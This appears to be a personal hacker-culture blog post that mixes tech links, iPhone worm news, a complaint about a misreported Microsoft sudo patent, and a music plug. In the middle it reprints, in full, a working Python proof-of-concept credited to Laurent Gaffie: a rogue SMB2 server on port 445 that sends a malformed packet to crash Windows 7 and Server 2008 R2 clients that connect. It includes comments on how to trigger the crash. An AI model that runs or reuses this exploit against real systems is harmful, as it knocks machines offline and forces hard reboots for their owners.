Before i get to the sudo thing, let me post some links...
This first one is a device that allows you to remotely play games on your console from your computer. pretty neat eh?
http://gizmodo.com/5359261/spawn-hd+720-is-like-a-slingbox-for-your-console-games
Next, i am sure you have all heard about the spreading iPhone worm that rick rolls you. and another worm deemed iPhone/Privacy.A, that allows an attacker to connect to a jailbroken iPhone which hasn’t had its root password changed. Fun stuff. But check this out, the author of the Rick Astley worm has been getting DEATH THREATS and job offers from the whole thing."
+++++
Yesterday I recv() a link to gizmodo.com claiming that Microsoft had gotten a patent for the *nix sudo(super user do) command. Of course me and others shit ourselves instantly. To no suprise this claim was a bit off balance. First of all, here is a link to the patent. and now read this to understand a little better.
"Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface
"At arrow 6, user interface 116 presents a
Obviously the linux/unix sudo is in no way related to a GUI, so whatever. Thanks gizmodo for the false hype! How would you have felt if someone had been murdered over this? serious biz!
Windows 7 / Server 2008R2 Remote Kernel Crash
Laurent Gaffie posted on his blog PoC code and some great information on this flaw, so no reason to re write it. Just click the link above. here is the PoC:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent GaffiƩ
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
+++++
I have to give props to my man Blockhead for his new album "The Music Scene". Blockhead used to make beats for Aesop Rock. His instrumentals are great coding/h4xing fuel and will have your brain dancing with the stars... not the terrible celebrity kind, but the ones in space. here is a **** but please buy it if you like it. I have already pre-ordered the vinyl that will be released Jan 5 of next year.
Link to AMAZON to buy the CD!
Link to other Blockhead and Aesop Rock media for sale!
and the next installment of "KewL GuY oF ThE wEeK" (extras for friday 13th)